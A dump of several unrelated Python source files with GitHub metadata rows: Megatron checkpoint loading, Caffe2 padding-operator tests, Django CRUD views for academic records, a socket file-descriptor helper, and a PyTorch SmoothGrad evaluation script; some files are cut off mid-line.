state_dict['lr_scheduler'] = lr_scheduler.state_dict()
# RNG states.
if not args.no_save_rng:
state_dict['random_rng_state'] = random.getstate()
state_dict['np_rng_state'] = np.random.get_state()
state_dict['torch_rng_state'] = torch.get_rng_state()
state_dict['cuda_rng_state'] = torch.cuda.get_rng_state()
state_dict['rng_tracker_states'] \
= mpu.get_cuda_rng_tracker().get_states()
# Save.
checkpoint_name = get_checkpoint_name(args.save, iteration)
ensure_directory_exists(checkpoint_name)
torch.save(state_dict, checkpoint_name)
# Wait so everyone is done (necessary)
torch.distributed.barrier()
if torch.distributed.get_rank() == 0:
print(' successfully saved checkpoint at iteration {:7d} to {}'.format(
iteration, args.save), flush=True)
# And update the latest iteration
if torch.distributed.get_rank() == 0:
tracker_filename = get_checkpoint_tracker_filename(args.save)
with open(tracker_filename, 'w') as f:
f.write(str(iteration))
# Wait so everyone is done (not necessary)
torch.distributed.barrier()
def load_checkpoint(model, optimizer, lr_scheduler, load_arg='load'):
"""Load a model checkpoint and return the iteration."""
args = get_args()
load_dir = getattr(args, load_arg)
if isinstance(model, torchDDP):
model = model.module
# Read the tracker file and set the iteration.
tracker_filename = get_checkpoint_tracker_filename(load_dir)
# If no tracker file, return iretation zero.
if not os.path.isfile(tracker_filename):
print_rank_0('WARNING: could not find the metadata file {} '.format(
tracker_filename))
print_rank_0(' will not load any checkpoints and will start from '
'random')
return 0
# Otherwise, read the tracker file and either set the iteration or
# mark it as a release checkpoint.
iteration = 0
release = False
with open(tracker_filename, 'r') as f:
metastring = f.read().strip() # 'release'
try:
iteration = int(metastring)
except ValueError:
release = metastring == 'release'
if not release:
print_rank_0('ERROR: Invalid metadata file {}. Exiting'.format(
tracker_filename))
sys.exit()
assert iteration > 0 or release, 'error parsing metadata file {}'.format(
tracker_filename)
# Checkpoint.
checkpoint_name = get_checkpoint_name(load_dir, iteration, release)
if torch.distributed.get_rank() == 0:
print(' loading checkpoint from {} at iteration {}'.format(
args.load, iteration), flush=True)
# Load the checkpoint.
try:
print('checkpoint_name={}'.format(checkpoint_name))
state_dict = torch.load(checkpoint_name, map_location='cpu') # TODO important here for loading state_dict into memory!
except ModuleNotFoundError:
from megatron.fp16_deprecated import loss_scaler
# For backward compatibility.
print_rank_0(' > deserializing using the old code structure ...')
sys.modules['fp16.loss_scaler'] = sys.modules[
'megatron.fp16_deprecated.loss_scaler']
sys.modules['megatron.fp16.loss_scaler'] = sys.modules[
'megatron.fp16_deprecated.loss_scaler']
state_dict = torch.load(checkpoint_name, map_location='cpu')
sys.modules.pop('fp16.loss_scaler', None)
sys.modules.pop('megatron.fp16.loss_scaler', None)
except BaseException:
print_rank_0('could not load the checkpoint')
sys.exit()
# set checkpoint version
set_checkpoint_version(state_dict.get('checkpoint_version', 0))
# Set iteration.
if args.finetune or release:
iteration = 0
else:
try:
iteration = state_dict['iteration'] # 2,000,000
except KeyError:
try: # Backward compatible with older checkpoints
iteration = state_dict['total_iters']
except KeyError:
print_rank_0('A metadata file exists but unable to load '
'iteration from checkpoint {}, exiting'.format(
checkpoint_name))
sys.exit()
# Check arguments.
assert args.consumed_train_samples == 0
assert args.consumed_valid_samples == 0
if 'args' in state_dict:
checkpoint_args = state_dict['args']
check_checkpoint_args(checkpoint_args)
args.consumed_train_samples = getattr(checkpoint_args,
'consumed_train_samples', 0)
update_num_microbatches(consumed_samples=args.consumed_train_samples)
args.consumed_valid_samples = getattr(checkpoint_args,
'consumed_valid_samples', 0)
else:
print_rank_0('could not find arguments(args) in the checkpoint ...')
# Model. TODO important for loading state_dict
model.load_state_dict(state_dict['model'])
# Optimizer.
if not release and not args.finetune and not args.no_load_optim:
try:
if optimizer is not None:
optimizer.load_state_dict(state_dict['optimizer'])
if lr_scheduler is not None:
lr_scheduler.load_state_dict(state_dict['lr_scheduler'])
except KeyError:
print_rank_0('Unable to load optimizer from checkpoint {}. '
'Specify --no-load-optim or --finetune to prevent '
'attempting to load the optimizer state, '
'exiting ...'.format(checkpoint_name))
sys.exit()
# rng states.
if not release and not args.finetune and not args.no_load_rng:
try:
random.setstate(state_dict['random_rng_state'])
np.random.set_state(state_dict['np_rng_state'])
torch.set_rng_state(state_dict['torch_rng_state'])
torch.cuda.set_rng_state(state_dict['cuda_rng_state'])
mpu.get_cuda_rng_tracker().set_states(
state_dict['rng_tracker_states'])
except KeyError:
print_rank_0('Unable to load optimizer from checkpoint {}. '
'Specify --no-load-rng or --finetune to prevent '
'attempting to load the optimizer state, '
'exiting ...'.format(checkpoint_name))
sys.exit()
torch.distributed.barrier()
if torch.distributed.get_rank() == 0:
print(' successfully loaded checkpoint from {} at iteration {}'.format(
args.load, iteration), flush=True)
# args.load='/workspace/megatron/ngc_models/release_bert_345m_uncased', iteration=0
return iteration
def load_ict_checkpoint(model, only_query_model=False, only_block_model=False, from_realm_chkpt=False):
"""selectively load ICT models for indexing/retrieving from ICT or REALM checkpoints"""
args = get_args()
if isinstance(model, torchDDP):
model = model.module
load_path = args.load if from_realm_chkpt else args.ict_load
tracker_filename = get_checkpoint_tracker_filename(load_path)
with open(tracker_filename, 'r') as f:
iteration = int(f.read().strip())
# assert iteration > 0
checkpoint_name = get_checkpoint_name(load_path, iteration, False)
if mpu.get_data_parallel_rank() == 0:
print('global rank {} is loading checkpoint {}'.format(
torch.distributed.get_rank(), checkpoint_name))
state_dict = torch.load(checkpoint_name, map_location='cpu')
ict_state_dict = state_dict['model']
if from_realm_chkpt and mpu.get_data_parallel_rank() == 0:
print(" loading ICT state dict from REALM", flush=True)
ict_state_dict = ict_state_dict['retriever']['ict_model']
if only_query_model:
ict_state_dict.pop('context_model')
if only_block_model:
ict_state_dict.pop('question_model')
model.load_state_dict(ict_state_dict)
torch.distributed.barrier()
if mpu.get_data_parallel_rank() == 0:
print(' successfully loaded {}'.format(checkpoint_name))
return model
| [
"[email protected]"
] | |
2ab9c6aae658796991d04ae8393361738813a7fb | b6233af6a39e7ab500743d6b2ac7d52f68ae3be2 | /15/00/2.py | b738c43f76091d7e37910b5e9ab030f6c459d903 | [
"CC0-1.0"
] | permissive | pylangstudy/201712 | 9754526e1d8f1c0519fcce98bc7df803f456cc4e | f18f1251074729c4a3865b113edc89ec06b54130 | refs/heads/master | 2021-09-02T06:08:08.278115 | 2017-12-30T23:04:55 | 2017-12-30T23:04:55 | 112,670,974 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | import socket, array
def send_fds(sock, msg, fds):
return sock.sendmsg([msg], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", fds))])
| [
"[email protected]"
] | |
2245d137d3c96c0d0184ca4ce3a2b2930945227a | e0980f704a573894350e285f66f4cf390837238e | /.history/news/models_20201124125236.py | 70a66f359a9f8e8b4fff11e3efb6146fd18c69f7 | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 160 | py | from django.db import models
from wagtail.contrib.forms.models import AbstractEmailForm
# Create your models here.
class NewsPage(AbstractEmailForm):
te | [
"[email protected]"
] | |
fdf3d2f3fa34b5f31a1a475f8b88058eb6fae21b | bff20a295661ddf2900a2777165f9b4bdfb5656b | /caffe2/python/operator_test/sequence_ops_test.py | 7afca6bdc0524fae9ad0460ff8998981fda678f4 | [
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla"
] | permissive | wangxu823/caffe2 | cc8ba41abacb36dd5ebb1c4ed68aaae6d43dd91f | 0a68778916f3280b5292fce0d74b73b70fb0f7e8 | refs/heads/master | 2021-04-04T11:29:54.224522 | 2016-08-09T23:22:45 | 2016-08-09T23:22:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,548 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import core
from hypothesis import given
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
from functools import partial
def _gen_test_add_padding(with_pad_data=True,
is_remove=False):
def gen_with_size(args):
lengths, inner_shape = args
data_dim = [sum(lengths)] + inner_shape
lengths = np.array(lengths, dtype=np.int64)
if with_pad_data:
return st.tuples(
st.just(lengths),
hu.arrays(data_dim),
hu.arrays(inner_shape),
hu.arrays(inner_shape))
else:
return st.tuples(st.just(lengths), hu.arrays(data_dim))
min_len = 4 if is_remove else 0
lengths = st.lists(
st.integers(min_value=min_len, max_value=10),
min_size=0,
max_size=5)
inner_shape = st.lists(
st.integers(min_value=1, max_value=3),
min_size=0,
max_size=2)
return st.tuples(lengths, inner_shape).flatmap(gen_with_size)
def _add_padding_ref(
start_pad_width, end_pad_width,
data, lengths, start_padding=None, end_padding=None):
if start_padding is None:
start_padding = np.zeros(data.shape[1:], dtype=data.dtype)
end_padding = (
end_padding if end_padding is not None else start_padding)
out_size = data.shape[0] + (
start_pad_width + end_pad_width) * len(lengths)
out = np.ndarray((out_size,) + data.shape[1:])
in_ptr = 0
out_ptr = 0
for length in lengths:
out[out_ptr:(out_ptr + start_pad_width)] = start_padding
out_ptr += start_pad_width
out[out_ptr:(out_ptr + length)] = data[in_ptr:(in_ptr + length)]
in_ptr += length
out_ptr += length
out[out_ptr:(out_ptr + end_pad_width)] = end_padding
out_ptr += end_pad_width
lengths_out = lengths + (start_pad_width + end_pad_width)
return (out, lengths_out)
def _remove_padding_ref(start_pad_width, end_pad_width, data, lengths):
pad_width = start_pad_width + end_pad_width
out_size = data.shape[0] - (
start_pad_width + end_pad_width) * len(lengths)
out = np.ndarray((out_size,) + data.shape[1:])
in_ptr = 0
out_ptr = 0
for length in lengths:
out_length = length - pad_width
out[out_ptr:(out_ptr + out_length)] = data[
(in_ptr + start_pad_width):(in_ptr + length - end_pad_width)]
in_ptr += length
out_ptr += out_length
lengths_out = lengths - (start_pad_width + end_pad_width)
return (out, lengths_out)
def _gather_padding_ref(start_pad_width, end_pad_width, data, lengths):
start_padding = np.zeros(data.shape[1:], dtype=data.dtype)
end_padding = np.zeros(data.shape[1:], dtype=data.dtype)
pad_width = start_pad_width + end_pad_width
ptr = 0
for length in lengths:
for i in range(start_pad_width):
start_padding += data[ptr]
ptr += 1
ptr += length - pad_width
for i in range(end_pad_width):
end_padding += data[ptr]
ptr += 1
return (start_padding, end_padding)
class TestSequenceOps(hu.HypothesisTestCase):
@given(start_pad_width=st.integers(min_value=1, max_value=2),
end_pad_width=st.integers(min_value=0, max_value=2),
args=_gen_test_add_padding(with_pad_data=True))
def test_add_padding(self, start_pad_width, end_pad_width, args):
lengths, data, start_padding, end_padding = args
start_padding = np.array(start_padding, dtype=np.float32)
end_padding = np.array(end_padding, dtype=np.float32)
op = core.CreateOperator(
'AddPadding',
['data', 'lengths', 'start_padding', 'end_padding'],
['output', 'lengths_out'],
padding_width=start_pad_width,
end_padding_width=end_pad_width)
self.assertReferenceChecks(
hu.cpu_do,
op,
[data, lengths, start_padding, end_padding],
partial(_add_padding_ref, start_pad_width, end_pad_width))
@given(start_pad_width=st.integers(min_value=1, max_value=2),
end_pad_width=st.integers(min_value=0, max_value=2),
args=_gen_test_add_padding(with_pad_data=False))
def test_add_zero_padding(self, start_pad_width, end_pad_width, args):
lengths, data = args
op = core.CreateOperator(
'AddPadding',
['data', 'lengths'],
['output', 'lengths_out'],
padding_width=start_pad_width,
end_padding_width=end_pad_width)
self.assertReferenceChecks(
hu.cpu_do,
op,
[data, lengths],
partial(_add_padding_ref, start_pad_width, end_pad_width))
@given(start_pad_width=st.integers(min_value=1, max_value=2),
end_pad_width=st.integers(min_value=0, max_value=2),
data=hu.tensor(min_dim=1, max_dim=3))
def test_add_padding_no_length(self, start_pad_width, end_pad_width, data):
op = core.CreateOperator(
'AddPadding',
['data'],
['output', 'output_lens'],
padding_width=start_pad_width,
end_padding_width=end_pad_width)
self.assertReferenceChecks(
hu.cpu_do,
op,
[data],
partial(
_add_padding_ref, start_pad_width, end_pad_width,
lengths=np.array([data.shape[0]])))
@given(start_pad_width=st.integers(min_value=1, max_value=2),
end_pad_width=st.integers(min_value=0, max_value=2),
args=_gen_test_add_padding(with_pad_data=False, is_remove=True))
def test_remove_padding(self, start_pad_width, end_pad_width, args):
lengths, data = args
op = core.CreateOperator(
'RemovePadding',
['data', 'lengths'],
['output', 'lengths_out'],
padding_width=start_pad_width,
end_padding_width=end_pad_width)
self.assertReferenceChecks(
hu.cpu_do,
op,
[data, lengths],
partial(_remove_padding_ref, start_pad_width, end_pad_width))
@given(start_pad_width=st.integers(min_value=1, max_value=2),
end_pad_width=st.integers(min_value=0, max_value=2),
args=_gen_test_add_padding(with_pad_data=True))
def test_gather_padding(self, start_pad_width, end_pad_width, args):
lengths, data, start_padding, end_padding = args
padded_data, padded_lengths = _add_padding_ref(
start_pad_width, end_pad_width, data,
lengths, start_padding, end_padding)
op = core.CreateOperator(
'GatherPadding',
['data', 'lengths'],
['start_padding', 'end_padding'],
padding_width=start_pad_width,
end_padding_width=end_pad_width)
self.assertReferenceChecks(
hu.cpu_do,
op,
[padded_data, padded_lengths],
partial(_gather_padding_ref, start_pad_width, end_pad_width))
@given(data=hu.tensor(min_dim=3, max_dim=3, dtype=np.float32,
elements=st.floats(min_value=-np.inf,
max_value=np.inf),
min_value=1, max_value=10),
**hu.gcs_cpu_only)
def test_reverse_packed_segs(self, data, gc, dc):
max_length = data.shape[0]
batch_size = data.shape[1]
lengths = np.random.randint(max_length + 1, size=batch_size)
op = core.CreateOperator(
"ReversePackedSegs",
["data", "lengths"],
["reversed_data"])
def op_ref(data, lengths):
rev_data = np.array(data, copy=True)
for i in range(batch_size):
seg_length = lengths[i]
for j in range(seg_length):
rev_data[j][i] = data[seg_length - 1 - j][i]
return (rev_data,)
def op_grad_ref(grad_out, outputs, inputs):
return op_ref(grad_out, inputs[1]) + (None,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[data, lengths],
reference=op_ref,
output_to_grad='reversed_data',
grad_reference=op_grad_ref)
| [
"[email protected]"
] | |
c3e593a11fa780431165c332212fd8a39a54f02a | 0f968baea4554519043c3ed4d1464fe4c64d592f | /src/mesh/deep/__init__.py | 2d81c12b5a07d5cf15b92582b6caa017185c5111 | [] | no_license | seantyh/OntoDeepLex | a50911edea9b3ce9f5997ecab327b4bb54783a00 | 89148884ff09710877d18d0a63da00a304060079 | refs/heads/master | 2023-01-22T23:23:35.653260 | 2020-11-23T13:14:22 | 2020-11-23T13:14:22 | 257,922,503 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 66 | py | from .tensor_utils import BertService
from .vocab import VocabZhTw | [
"[email protected]"
] | |
d85e0b393ae8d8ee90e85e1f7704da446a52d993 | 5e9eba022385185a2c84d60fffe6cdf04421ed1b | /academicos/views.py | e44f4be6e8ae947cd6a615b5209a4e6d14064e29 | [] | no_license | lizceth/proyecto-eventos | 4a6de50ee7ae7705fb7a81cb4fdbdbe2c9ed9516 | b408149a463d130da72bb555237814cc5bb2dbfa | refs/heads/master | 2020-06-02T18:21:08.415503 | 2014-10-14T22:35:26 | 2014-10-14T22:35:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,361 | py | from django.contrib.auth.models import User
from django.shortcuts import render, render_to_response, get_object_or_404
from academicos.models import Coordinador, Escuela, Facultad
from django.http import HttpResponse, HttpResponseRedirect
from django.template import RequestContext
from asistentes.models import Persona
from asistentes.forms import *
#from django.core.mail import EmailMessage
#from django.contrib.auth.forms import UserCreationForm, AuthentificationForm
#from django.contrib.auth import login, authentificate, logout
#from django.contrib.auth.decorators import login_required
from academicos.forms import CoordinadorForm, EscuelaForm, FacultadForm
def Cordinadores(request):
cordinadores = Coordinador.objects.all()
titulo = "Lista de Cordinadores"
return render_to_response('academicos/cordinadoresList.html',{
'cordinadores':cordinadores,'titulo':titulo},
context_instance=RequestContext(request))
def Cordinador_add(request):
if request.method == "POST":
formulario = CoordinadorForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/cordinadoresList/')
else:
formulario = CoordinadorForm()
return render_to_response('academicos/cordinadoresAdd.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Cordinador_edit (request, id):
cordinador_edit= Coordinador.objects.get(pk=id)
if request.method == 'POST':
formulario = CoordinadorForm(
request.POST, instance = cordinador_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/cordinadoresList/")
else:
formulario = CoordinadorForm(instance= cordinador_edit)
return render_to_response('academicos/cordinadoresEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Cordinador_borrar (request, id):
cordinador_borrar = get_object_or_404(Coordinador, pk=id)
cordinador_borrar.delete()
return HttpResponseRedirect("/cordinadoresList/")
def Escuelas(request):
escuelas = Escuela.objects.all()
titulo = "Lista de Escuelas"
return render_to_response('academicos/escuelasList.html',
{'escuelas':escuelas,'titulo':titulo},
context_instance=RequestContext(request))
def Escuela_add (request):
if request.method == "POST":
formulario = EscuelaForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/escuelaList/')
else:
formulario = EscuelaForm()
return render_to_response('academicos/escuelasAdd.html',
{'formulario':formulario},
context_instance=RequestContext(request))
def Escuela_edit (request, id):
escuela_edit= Escuela.objects.get(pk=id)
if request.method == 'POST':
formulario = EscuelaForm(
request.POST, instance = escuela_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/escuelaList/")
else:
formulario = EscuelaForm(instance= escuela_edit)
return render_to_response('academicos/escuelasEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Escuelas_borrar (request, id):
escuelas_borrar = get_object_or_404(Escuela, pk=id)
escuelas_borrar.delete()
return HttpResponseRedirect("/escuelaList/")
def Facultades(request):
facultades = Facultad.objects.all()
titulo = "Lista de Facultades"
return render_to_response('academicos/facultadList.html',{
'facultades':facultades,'titulo':titulo},
context_instance=RequestContext(request))
def Facultad_add(request):
if request.method == "POST":
formulario = FacultadForm(request.POST)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect('/facultadesList/')
else:
formulario = FacultadForm()
return render_to_response('academicos/facultadAdd.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Facultad_edit (request, id):
facultad_edit= Facultad.objects.get(pk=id)
if request.method == 'POST':
formulario = FacultadForm(
request.POST, instance = facultad_edit)
if formulario.is_valid():
formulario.save()
return HttpResponseRedirect("/facultadesList/")
else:
formulario = FacultadForm(instance= facultad_edit)
return render_to_response('academicos/facultadEdit.html',
{'formulario': formulario},
context_instance = RequestContext(request))
def Facultad_borrar (request, id):
facultad_borrar = get_object_or_404(Facultad, pk=id)
facultad_borrar.delete()
return HttpResponseRedirect("/facultadesList/")
| [
"[email protected]"
] | |
44325715254c5869560d81e2367ac008235b3da6 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /r9y4yrSAGRaqTT7nM_21.py | 1ca7a31c9dbf3fb55b5622f3aa279dfb1fc15050 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py |
find_missing=lambda l:sum(range(len(min(l,key=len)),len(max(l,key=len))+1))-sum(len(x)for x in l)if l and all(l)else 0
| [
"[email protected]"
] | |
25fba7312e0c89bdf77f6d597d2878f52fb8b372 | b7f1557e5a2ac164e59918efe3ac07f781699012 | /code/baseline/gen_result.py | 51d7c2fe3e27ce9a5fc0fe602528bc020e967593 | [] | no_license | aspnetcs/AT-CNN | 2dfeb1928df9521ac5a5c8f9bb8d082ad9237b2a | 46d1dfa599c186def93d48e1589b02f111a67599 | refs/heads/master | 2022-12-25T19:40:41.036715 | 2020-10-06T00:50:05 | 2020-10-06T00:50:05 | 299,809,649 | 0 | 0 | null | 2020-09-30T04:35:24 | 2020-09-30T04:35:24 | null | UTF-8 | Python | false | false | 11,444 | py | from utils import GetSmoothGrad, clip_and_save_single_img, clip_gradmap
import os
from cv2 import imwrite, imread
import argparse
import torch
import numpy as np
import torch
from utils import get_a_set
import torch.nn.functional as F
import torch.nn as nn
from dataset import create_test_dataset, create_train_dataset, \
create_saturation_test_dataset, create_edge_test_dataset, \
create_style_test_dataset, create_brighness_test_dataset, create_patch_test_dataset
import torchvision.models as models
import skimage.io as io
def GetSmoothRes(net, Data, DEVICE, save_path ='./SmoothRes/Fashion_MNIST'):
for i, (img, label) in enumerate(zip(Data.X, Data.Y)):
#print(i)
#print(img.shape, label.shape)
img = img.astype(np.float32)
#label = label.astype(np.float32)
img = img[np.newaxis,:]
img = torch.tensor(img)
#print(img.type())
label = torch.tensor(label).type(torch.LongTensor)
grad_map = GetSmoothGrad(net, img, label, DEVICE = DEVICE)
grad_map = grad_map.cpu().detach().numpy()
grad_map = clip_gradmap(grad_map)
#print(grad_map.shape, grad_map.mean())
save_p = os.path.join(save_path, '{}.png'.format(i))
#print(grad_map.shape)
imwrite(save_p, grad_map)
print('{} imgs saved in {}'.format(i+1, save_path))
def get_result(net, dl, DEVICE, net_name = ''):
save_bench = '../../data/benchmark/'
save_path = os.path.join('../../SmoothRes/', net_name)
labels = []
net.eval()
mean = torch.tensor(np.array([0.485, 0.456, 0.406]).astype(np.float32)[np.newaxis, :, np.newaxis, np.newaxis])
std = torch.tensor(np.array([0.229, 0.224, 0.225]).astype(np.float32)[np.newaxis, :, np.newaxis, np.newaxis])
mean = mean.to(DEVICE)
std = std.to(DEVICE)
for i, (batch_img, batch_label) in enumerate(dl):
if i> 5:
break
for j in range(int(batch_img.size(0))):
img = batch_img[j]
label = batch_label[j]
img = img.to(DEVICE)
label = label.to(DEVICE)
#print(img.size())
grad_map = GetSmoothGrad(net, img, label, DEVICE, stdev_spread = 0.05)
#print(grad_map.shape)
clip_and_save_single_img(grad_map, i * batch_img.size(0) + j, save_dir=save_path)
#print(grad.shape)
#simg = (img + mean) * std
simg = img * std + mean
#print('rb', simg.max(), simg.min())
simg = torch.clamp(simg, 0, 1)
#print('r', simg.max(), simg.min())
simg = simg.detach().cpu().numpy() * 255.0
#print(simg.shape)
#print(simg.shape)
simg = simg[0]
simg = np.transpose(simg, (1, 2, 0)).astype(np.uint8)
#print('r', simg.max(), simg.min())
#imwrite(os.path.join(save_bench, '{}.png'.format(i * batch_img.size(0) + j)), simg)
io.imsave(os.path.join(save_bench, '{}.png'.format(i * batch_img.size(0) + j)), simg)
print(i * batch_img.size(0) + j)
#grad = imread(os.path.join(save_path, '{}-smooth.png'.format(i * batch_img.size(0) + j)))
grad = io.imread(os.path.join(save_path, '{}-smooth.png'.format(i * batch_img.size(0) + j)),
as_gray = False)
# if gray
# grad = grad[:, :, np.newaxis]
# grad = np.repeat(grad, 3, axis = 2)
gray_grad = np.mean(grad, axis = -1, keepdims = True)
gray_grad = gray_grad.astype(np.uint8)
gray_grad = np.repeat(gray_grad, 3, axis = 2)
pair_img = np.concatenate((gray_grad, grad, simg), axis=1)
#imwrite(os.path.join(save_path, '{}-pair.png'.format(i * batch_img.size(0) + j)), pair_img)
io.imsave(os.path.join(save_path, '{}-pair.png'.format(i * batch_img.size(0) + j)), pair_img)
labels.append(batch_label.numpy())
labels = np.array(labels)
np.savetxt(os.path.join(save_bench, 'label.txt'), labels.reshape(-1))
#MakeVisual(save_bench, save_path)
def l1_for_without_smooth(net, dl, DEVICE):
net.eval()
net.to(DEVICE)
#criterion = nn.CrossEntropyLoss().to(DEVICE)
l1s = []
for i, (batch_img, batch_label) in enumerate(dl):
#if i> 5:
# break
for j in range(int(batch_img.size(0))):
img = batch_img[j]
label = batch_label[j]
img = img.to(DEVICE)
label = label.to(DEVICE)
#print(img.size())
grad_map = GetSmoothGrad(net, img, label, DEVICE, stdev_spread = 0.05, num=32)
#print(grad_maps.size(), batch_img.size())
l1s.append(torch.norm(grad_map, 1).item())
l1s = np.array(l1s)
print("Min: {:.4f} -- Max: {:.2f} -- Mean:{:.2f}".format(l1s.min(), l1s.max(), l1s.mean()))
def l1_for_with_smooth(net, dl, DEVICE):
net.eval()
net.to(DEVICE)
criterion = nn.CrossEntropyLoss().to(DEVICE)
l1s = []
for i, (batch_img, batch_label) in enumerate(dl):
batch_img = batch_img.to(DEVICE)
batch_label = batch_label.to(DEVICE)
batch_img.requires_grad = True
pred = net(batch_img)
loss = criterion(pred, batch_label)
grad_maps = torch.autograd.grad(loss, batch_img, create_graph=True, only_inputs=False)[0]
#print(grad_maps.size(), batch_img.size())
l1s.append(torch.norm(grad_maps, 1).item())
l1s = np.array(l1s)
print("Min: {:.2f} -- Max: {:.2f} -- Mean:{:.2f}".format(l1s.min(), l1s.max(), l1s.mean()))
def MakeVisual(data_dir = './benchmark/CIFAR', result_dir = './SmoothRes/CIFAR/'):
save_p = result_dir.split('/')[:-1]
save_p = os.path.join(*save_p)
print(save_p)
net_name = result_dir.split('/')[-1]
labels = np.loadtxt(os.path.join(data_dir, 'label.txt'))
imgs = get_a_set(labels, result_dir, data_dir, times = 3)
print(os.path.join(save_p, '{}.png'.format(net_name)))
imwrite(os.path.join(save_p, '{}.png'.format(net_name)), imgs)
def test_model(net, dl):
acc1s = []
acc3s = []
net.eval()
for i, (batch_img, batch_label) in enumerate(dl):
batch_img = batch_img.to(DEVICE)
batch_label = batch_label.to(DEVICE)
pred = net(batch_img)
acc1, acc3 = torch_accuracy(pred, batch_label)
acc1s.append(acc1)
acc3s.append(acc3)
acc1s = np.array(acc1s)
acc3s = np.array(acc3s)
print('accuracy top-1: {} top-3: {}'.format(acc1s.mean(), acc3s.mean()))
def test_model_genera(net, dl, dl_teacher):
acc1s = []
acc3s = []
aacc1s = []
aacc3s = []
net.eval()
dl_teacher = enumerate(dl_teacher)
with torch.no_grad():
for i, (batch_img, batch_label) in enumerate(dl):
j, (teacher_img, _) = next(dl_teacher)
#print(torch.sum(torch.eq(_, batch_label).float()))
teacher_img = teacher_img.to(DEVICE)
batch_img = batch_img.to(DEVICE)
batch_label = batch_label.to(DEVICE)
pred = net(batch_img)
teacher = net(teacher_img)
acc1, acc3 = torch_genera_accuracy(pred, batch_label, teacher)
aacc1, aacc3 = torch_accuracy(pred, batch_label)
tacc1, tacc3 = torch_accuracy(teacher, batch_label)
acc1 = (acc1 / tacc1) * 100
acc3 = (acc3 / tacc3) * 100
acc1s.append(acc1)
acc3s.append(acc3)
aacc1s.append(aacc1)
aacc3s.append(aacc3)
acc1s = np.array(acc1s)
acc3s = np.array(acc3s)
aacc1s = np.array(aacc1s)
aacc3s = np.array(aacc3s)
print('accuracy top-1: {:.2f} top-3: {:.2f}'.format(acc1s.mean(), acc3s.mean()))
print('Absolute accuracy top-1: {:.2f} top-3: {:.2f}'.format(aacc1s.mean(), aacc3s.mean()))
def torch_accuracy(output, target, topk = (1, 3)):
'''
param output, target: should be torch Variable
'''
#assert isinstance(output, torch.cuda.Tensor), 'expecting Torch Tensor'
#assert isinstance(target, torch.Tensor), 'expecting Torch Tensor'
#print(type(output))
topn = max(topk)
batch_size = output.size(0)
_, pred = output.topk(topn, 1, True, True)
pred = pred.t()
is_correct = pred.eq(target.view(1, -1).expand_as(pred))
ans = []
for i in topk:
is_correct_i = is_correct[:i].view(-1).float().sum(0, keepdim = True)
ans.append(is_correct_i.mul_(100.0 / batch_size))
return ans
def torch_genera_accuracy(output, target, teacher, topk = (1, 3)):
'''
param output, target: should be torch Variable
'''
#assert isinstance(output, torch.cuda.Tensor), 'expecting Torch Tensor'
#assert isinstance(target, torch.Tensor), 'expecting Torch Tensor'
#print(type(output))
topn = max(topk)
batch_size = output.size(0)
_, pred = output.topk(topn, 1, True, True)
pred = pred.t()
_, teacher_pred = teacher.topk(topn, 1, True, True)
teacher_pred = teacher_pred.t()
is_correct = pred.eq(target.view(1, -1).expand_as(pred))
is_teacher_correct = teacher_pred.eq(target.view(1, -1).expand_as(teacher_pred))
ans = []
for i in topk:
is_correct_i = is_correct[:i].view(-1).float()# .sum(0, keepdim = True)
is_teacher_correct_i = is_teacher_correct[:i].view(-1).float()
genera_correct_i = is_correct_i * is_teacher_correct_i
genera_correct_i = genera_correct_i.sum(0, keepdim = True)
#ans.append(is_correct_i.mul_(100.0 / batch_size))
ans.append(genera_correct_i.mul_(100.0 / batch_size))
return ans
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--resume', type = str,
default='../exps/tradeoff.eps8/checkpoint.pth.tar')
parser.add_argument('-d', type = int, default=1)
parser.add_argument('-p', type = float, default=None, help = 'saturation level; 2 unchanged')
parser.add_argument('-b', type=float, default=None, help='brightness level; 1 unchanged')
parser.add_argument('-e', action = 'store_true', default=False, help='Edges?')
parser.add_argument('-k', type=int, default=None, help='patch num')
args = parser.parse_args()
net_name = args.resume.split('/')[-2]
print(net_name)
path = os.path.join('../../SmoothRes', net_name)
if not os.path.exists(path):
os.mkdir(path)
net = models.resnet18(pretrained=False)
net.fc = nn.Linear(512, 257)
net.load_state_dict(torch.load(args.resume)['state_dict'])
DEVICE = torch.device('cuda:{}'.format(args.d))
net.to(DEVICE)
dl_teacher = create_test_dataset(32)
if args.p is None and args.b is None:
dl = create_test_dataset(32)
if args.b is not None and args.p is None:
dl = create_brighness_test_dataset(batch_size = 32,
root = './', bright_level = args.b)
if args.p is not None and args.b is None:
dl = create_saturation_test_dataset(32, root = './', saturation_level = args.p)
if args.k is not None:
print('Creating path data')
dl = create_patch_test_dataset(32, './', args.k)
# style
